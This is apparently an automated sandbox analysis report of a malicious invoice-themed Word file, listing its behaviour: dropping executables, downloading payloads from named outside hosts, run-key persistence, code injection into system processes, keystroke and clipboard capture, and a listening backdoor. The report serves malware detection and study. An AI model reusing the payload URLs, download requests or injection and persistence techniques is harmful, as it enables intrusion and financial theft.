
Analysis Report

Overview

General Information

Analysis ID: 45867
Start time: 11:24:00
Start date: 08/08/2014
Overall analysis duration: 0h 2m 49s
Report type: full
Sample file name: Rechnung_05052014.doc
Cookbook file name: default.jbs
Analysis system description: XP SP3 (Office 2003 SP1, Java 1.5.0, Acrobat Reader 8.1.2, Internet Explorer 6, Flash 10.1.82.76)
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 4
HCA enabled: true
HCA success:
  • true, ratio: 93%
  • Number of executed functions: 149
  • Number of non-executed functions: 1112
Warnings:
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtMapViewOfSection calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Report size getting too big, too many NtSetInformationProcess calls found.


Detection

StrategyReport FP/FN
Threshold malicious


Signature Overview


Protection of GUI:

Contains functionality to create a new desktop
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe | Code function: 5_2_0042886A OpenWindowStationW,CreateWindowStationW,GetProcessWindowStation,OpenDesktopW,CreateDesktopW,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,CloseDesktop,CloseWindowStation,5_2_0042886A

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe | Code function: 5_1_00414477 OpenClipboard,5_1_00414477
Contains functionality to read the clipboard data
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe | Code function: 5_2_004079BF InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,CreateFileW,ReadFile,CloseHandle,InitializeCriticalSection,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,GetFileAttributesExW,HttpSendRequestW,HttpSendRequestA,HttpSendRequestExW,HttpSendRequestExA,InternetCloseHandle,InternetReadFile,InternetReadFileExA,InternetQueryDataAvailable,HttpQueryInfoA,closesocket,send,WSASend,TranslateMessage,GetClipboardData,5_2_004079BF
Contains functionality to retrieve information about pressed keystrokes
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe | Code function: 5_2_00428575 EnterCriticalSection,GetTickCount,LeaveCriticalSection,GetKeyboardState,ToUnicode,TranslateMessage,5_2_00428575
Hooks clipboard functions (used to sniff clipboard data)
Source: explorer.exe | IAT, EAT or inline hook detected: module: USER32.dll function: GetClipboardData

E-Banking Fraud:

Hooks winsocket function (used for sniffing or altering network traffic)
Source: explorer.exe | File created: function: InternetReadFile

Software Vulnerablities:

Document exploit detected (droppes PE files)
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE | File created: ZwGuKEMphiZgNT.com.dr
Document exploit detected (performs DNS queries)
Source: global traffic | DNS query: name: pensionmagda.cz
Document exploit detected (performs HTTP gets)
Source: global traffic | TCP traffic: 192.168.1.13:1030 -> 217.198.114.63:80
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE | Process created: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.com
Document exploit detected (unknown TCP traffic)
Source: global traffic | TCP traffic: 192.168.1.13:1030 -> 217.198.114.63:80

Networking:

Urls found in memory or binary data
Source: 3463226.exe | String found in binary or memory: http://
Source: Rechnung_05052014.doc | String found in binary or memory: http://office365.com
Source: Rechnung_05052014.doc | String found in binary or memory: http://office365.com/
Source: ZwGuKEMphiZgNT.com | String found in binary or memory: http://pensionmagda.cz/wzrk.exe
Source: Rechnung_05052014.doc | String found in binary or memory: http://schemas.openxmlformats.org/drawingml/2006/main
Source: Rechnung_05052014.doc | String found in binary or memory: http://schemas.openxmlformats.org/officedocument/2006/bibliography
Source: Rechnung_05052014.doc | String found in binary or memory: http://schemas.openxmlformats.org/officedocument/2006/customxml
Source: 3463226.exe | String found in binary or memory: http://www.google.com/webhp
Source: 3463226.exe | String found in binary or memory: https://
Contains functionality to download additional files from the internet
Source: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.com | Code function: 4_2_00403867 recv,4_2_00403867
Downloads files
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE | File created: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.MSO
Tries to download non-existing http data (HTTP/1.1 404 Not Found)
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 08 Aug 2014 09:26:03 GMT Server: Apache/2.2.16 (Debian) Vary: accept-language,accept-charset,Accept-Encoding Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Language: en Expires: Fri, 08 Aug 2014 09:26:03 GMT Data Ascii: <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://ww
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: GET /wzrk.exe HTTP/1.0 Host: pensionmagda.cz Accept-Language: en-US Accept: */* Accept-Encoding: identity, *;q=0 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic | HTTP traffic detected: GET /wzrk.exe HTTP/1.0 Host: www.pensionmagda.cz Accept-Language: en-US Accept: */* Accept-Encoding: identity, *;q=0 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic | HTTP traffic detected: GET /gdfyergjej.exe HTTP/1.0 Host: pianossimi.fr Accept-Language: en-US Accept: */* Accept-Encoding: identity, *;q=0 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: pensionmagda.cz
Uses a known web browser user agent for HTTP communication
Source: global traffic | HTTP traffic detected: GET /wzrk.exe HTTP/1.0 Host: pensionmagda.cz Accept-Language: en-US Accept: */* Accept-Encoding: identity, *;q=0 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic | HTTP traffic detected: GET /wzrk.exe HTTP/1.0 Host: www.pensionmagda.cz Accept-Language: en-US Accept: */* Accept-Encoding: identity, *;q=0 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic | HTTP traffic detected: GET /gdfyergjej.exe HTTP/1.0 Host: pianossimi.fr Accept-Language: en-US Accept: */* Accept-Encoding: identity, *;q=0 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

Boot Survival:

Creates an autostart registry key
Source: C:\WINDOWS\explorer.exe | Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run gonuu.exe
Drops PE files to the user root directory (C:\Documents and Settings\User or C:\Users\User)
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE | File created: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.com
Monitors registry run keys for changes
Source: C:\WINDOWS\system32\ctfmon.exe | Registry key monitored: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe | Code function: 5_2_0041B962 socket,bind,closesocket,5_2_0041B962
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe | Code function: 5_2_0041B57B socket,bind,listen,closesocket,5_2_0041B57B
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe | Code function: 5_2_00BBB962 socket,bind,closesocket,5_2_00BBB962
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe | Code function: 5_2_00BBB57B socket,bind,listen,closesocket,5_2_00BBB57B
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exe | Code function: 6_2_0041B962 socket,bind,closesocket,6_2_0041B962
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exe | Code function: 6_2_0041B57B socket,bind,listen,closesocket,6_2_0041B57B
Source: C:\WINDOWS\explorer.exe | Code function: 7_2_00E4B57B socket,bind,listen,#3,7_2_00E4B57B
Source: C:\WINDOWS\explorer.exe | Code function: 7_2_00E4B962 socket,bind,#3,7_2_00E4B962
Source: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe | Code function: 8_2_00A0B57B socket,bind,listen,#3,8_2_00A0B57B
Source: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe | Code function: 8_2_00A0B962 socket,bind,#3,8_2_00A0B962
Source: C:\WINDOWS\system32\ctfmon.exe | Code function: 9_2_00A4B962 socket,bind,#3,9_2_00A4B962
Source: C:\WINDOWS\system32\ctfmon.exe | Code function: 9_2_00A4B57B socket,bind,listen,#3,9_2_00A4B57B
Opens a port and listens for incoming connection (possibly a backdoor)
Source: C:\WINDOWS\explorer.exe | Socket bind: port: 38677
Contains VNC / remote desktop functionality (RFB version string found)
Source: 3463226.exe | String found in binary or memory: RFB 003.003

Persistence and Installation Behavior:

Drops PE files
Source: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.com | File created: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE | File created: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.com
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe | File created: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exe
Drops PE files to the user directory (C:\Documents and Settings\)
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE | File created: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.com
Drops PE files with a suspicious file extension
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE | File created: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.com

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.com | Code function: 4_2_0040236E LoadLibraryA,LoadLibraryA,GetProcAddress,4_2_0040236E

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe | Code function: 5_2_0041DD7A FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,5_2_0041DD7A

System Summary:

Has a correct PE checksum
Source: initial sample | Static PE information: Present: = calced
Contains functionality to access the windows certificate store
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe | Code function: 5_2_00420A6C CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,5_2_00420A6C
Contains functionality to adjust token privileges (e.g. debug / backup)
Source: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.com | Code function: 4_2_0040280F LookupPrivilegeValueA,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,4_2_0040280F
Contains functionality to enum processes or threads
Source: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.com | Code function: 4_2_00402B98 WTSGetActiveConsoleSessionId,CreateToolhelp32Snapshot,Process32First,StrStrIA,ProcessIdToSessionId,OpenProcess,OpenProcessToken,ImpersonateLoggedOnUser,RegOpenCurrentUser,CloseHandle,CloseHandle,CloseHandle,Process32Next,CloseHandle,4_2_00402B98
Creates files inside the user directory
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE | File created: C:\Documents and Settings\Administrator\Application Data\Microsoft\Office
Creates temporary files
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE | File created: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~DFD7A6.tmp
Executes batch files
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe | Process created: C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp17a7aa60.bat
Reads ini files
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE | File read: C:\WINDOWS\win.ini
Spawns processes
Source: unknown | Process created: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE
Source: unknown | Process created: C:\WINDOWS\system32\svchost.exe
Source: unknown | Process created: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.com
Source: unknown | Process created: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe
Source: unknown | Process created: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exe
Source: unknown | Process created: C:\WINDOWS\system32\cmd.exe
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE | Process created: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.com ZwGuKEMphiZgNT.com
Source: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.com | Process created: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe | Process created: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exe C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exe
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe | Process created: C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp17a7aa60.bat
Contains functionality to call native functions
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe | Code function: 5_2_004088DB EntryPoint,SetErrorMode,GetCommandLineW,CommandLineToArgvW,ExitProcess,NtClose,NtClose,NtClose,NtClose,NtClose,Sleep,NtClose,5_2_004088DB
Contains functionality to launch a process as a different user
Source: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.com | Code function: 4_2_00402D3C CreateProcessAsUserA,ShellExecuteA,ShellExecuteA,4_2_00402D3C
Contains functionality to shutdown / reboot the system
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe | Code function: 5_2_00408600 CreateMutexW,ExitWindowsEx,OpenEventW,CloseHandle,SetEvent,CloseHandle,CloseHandle,5_2_00408600
Creates files inside the system directory
Source: C:\WINDOWS\system32\svchost.exe | File created: C:\WINDOWS\Sti_Trace.log
Creates mutexes
Enables driver privileges
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE | Process token adjusted: Load Driver
Enables security privileges
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe | Process token adjusted: Security
Reads the hosts file
Source: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.com | File read: C:\WINDOWS\system32\drivers\etc\hosts
Tries to load missing DLLs
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE | Section loaded: xpsp2res.dll
Source: C:\WINDOWS\system32\svchost.exe | Section loaded: xpsp2res.dll
Source: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe | Section loaded: xpsp2res.dll

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to add an ACL to a security descriptor
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exe | Code function: 5_2_0041BB34 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,LocalFree,5_2_0041BB34
Contains functionality to create a new security descriptor
Source: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.com | Code function: 4_2_00402E8B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,4_2_00402E8B
May try to detect the Windows Explorer process (often used for injection)
Source: WINWORD.EXE | Binary or memory string: Program Manager
Source: WINWORD.EXE | Binary or memory string: Shell_TrayWnd
Allocates memory in foreign processes
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exe | Memory allocated: C:\WINDOWS\explorer.exe base: E30000 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exe | Memory allocated: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe base: 9F0000 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exe | Memory allocated: C:\WINDOWS\system32\ctfmon.exe base: A30000 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exe | Memory allocated: C:\WINDOWS\system32\wscntfy.exe base: AF0000 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exe | Memory allocated: unknown base: 47F0000 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exe | Memory allocated: unknown base: BA0000 protect: page execute and read and write
Changes memory attributes in foreign processes to executable or writable
Injects a PE file into foreign processes
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\WINDOWS\explorer.exe base: E30000 value starts with: 4D5A
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe base: 9F0000 value starts with: 4D5A
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\WINDOWS\system32\ctfmon.exe base: A30000 value starts with: 4D5A
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\WINDOWS\system32\wscntfy.exe base: AF0000 value starts with: 4D5A
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: unknown base: 47F0000 value starts with: 4D5A
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: unknown base: BA0000 value starts with: 4D5A
Maps a DLL or memory area into another process
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeSection loaded: unknown target pid: 1496 protection: execute and read and write
Writes to foreign memory regions
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\WINDOWS\explorer.exe base: E30000
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\WINDOWS\explorer.exe base: E62AB0
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\WINDOWS\explorer.exe base: E62AC4
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\WINDOWS\explorer.exe base: E62F88
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\WINDOWS\explorer.exe base: E62F8C
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\WINDOWS\explorer.exe base: E629A0
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\WINDOWS\explorer.exe base: E62AF4
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\WINDOWS\explorer.exe base: E62980
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe base: 9F0000
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe base: A22AB0
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe base: A22AC4
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe base: A22F88
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe base: A22F8C
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe base: A229A0
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe base: A22AF4
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe base: A22980
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\WINDOWS\system32\ctfmon.exe base: A30000
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\WINDOWS\system32\ctfmon.exe base: A62AB0
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\WINDOWS\system32\ctfmon.exe base: A62AC4
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\WINDOWS\system32\ctfmon.exe base: A62F88
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\WINDOWS\system32\ctfmon.exe base: A62F8C
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\WINDOWS\system32\ctfmon.exe base: A629A0
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\WINDOWS\system32\ctfmon.exe base: A62AF4
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\WINDOWS\system32\ctfmon.exe base: A62980
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\WINDOWS\system32\wscntfy.exe base: AF0000
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\WINDOWS\system32\wscntfy.exe base: B22AB0
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\WINDOWS\system32\wscntfy.exe base: B22AC4
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\WINDOWS\system32\wscntfy.exe base: B22F88
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\WINDOWS\system32\wscntfy.exe base: B22F8C
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\WINDOWS\system32\wscntfy.exe base: B229A0
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\WINDOWS\system32\wscntfy.exe base: B22AF4
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: C:\WINDOWS\system32\wscntfy.exe base: B22980
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: unknown base: 47F0000
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: unknown base: 4822AB0
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: unknown base: 4822AC4
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: unknown base: 4822F88
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: unknown base: 4822F8C
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: unknown base: 48229A0
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: unknown base: 4822AF4
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: unknown base: 4822980
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: unknown base: BA0000
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: unknown base: BD2AB0
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: unknown base: BD2AC4
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: unknown base: BD2F88
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: unknown base: BD2F8C
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: unknown base: BD29A0
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: unknown base: BD2AF4
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeMemory written: unknown base: BD2980

Anti Debugging and Sandbox Evasion:

Contains functionality to query system information
Source: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.comCode function: 4_2_00404644 GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,lstrlenA,GetModuleHandleA,GetProcAddress,GetSystemInfo,4_2_00404644
Contains functionality to register its own exception handler
Source: C:\Documents and Settings\Administrator\ZwGuKEMphiZgNT.comCode function: 4_2_00404B5A SetUnhandledExceptionFilter,RevertToSelf,4_2_00404B5A
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exeCode function: 5_1_0040D75C SetUnhandledExceptionFilter,MapAndLoad,IsBadStringPtrW,5_1_0040D75C
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exeCode function: 5_1_0042533A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_1_0042533A
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exeCode function: 5_1_004139E2 SetUnhandledExceptionFilter,DialogBoxParamW,CreateFileMappingW,5_1_004139E2
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exeCode function: 5_1_0041107F UnmapViewOfFile,SetUnhandledExceptionFilter,RegUnLoadKeyA,5_1_0041107F
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exeCode function: 5_1_00425415 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_1_00425415
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exeCode function: 5_1_00416AF4 GetPrinterDriverW,SetUnhandledExceptionFilter,StartDocW,5_1_00416AF4
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exeCode function: 5_0_0040D75C SetUnhandledExceptionFilter,MapAndLoad,IsBadStringPtrW,5_0_0040D75C
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exeCode function: 5_0_0042533A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_0_0042533A
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exeCode function: 5_0_004139E2 SetUnhandledExceptionFilter,DialogBoxParamW,CreateFileMappingW,5_0_004139E2
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exeCode function: 5_0_0041107F UnmapViewOfFile,SetUnhandledExceptionFilter,RegUnLoadKeyA,5_0_0041107F
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exeCode function: 5_0_00425415 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_0_00425415
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3463226.exeCode function: 5_0_00416AF4 GetPrinterDriverW,SetUnhandledExceptionFilter,StartDocW,5_0_00416AF4
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeCode function: 6_1_0040D75C SetUnhandledExceptionFilter,MapAndLoad,IsBadStringPtrW,6_1_0040D75C
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeCode function: 6_1_0042533A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_1_0042533A
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeCode function: 6_1_004139E2 SetUnhandledExceptionFilter,DialogBoxParamW,CreateFileMappingW,6_1_004139E2
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeCode function: 6_1_0041107F UnmapViewOfFile,SetUnhandledExceptionFilter,RegUnLoadKeyA,6_1_0041107F
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeCode function: 6_1_00425415 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_1_00425415
Source: C:\Documents and Settings\Administrator\Application Data\Ytalg\gonuu.exeCode function: 6_1_00416AF4 GetPrinterDriverW,SetUnhandledExceptionFilter,StartDocW,6_1_00416AF4
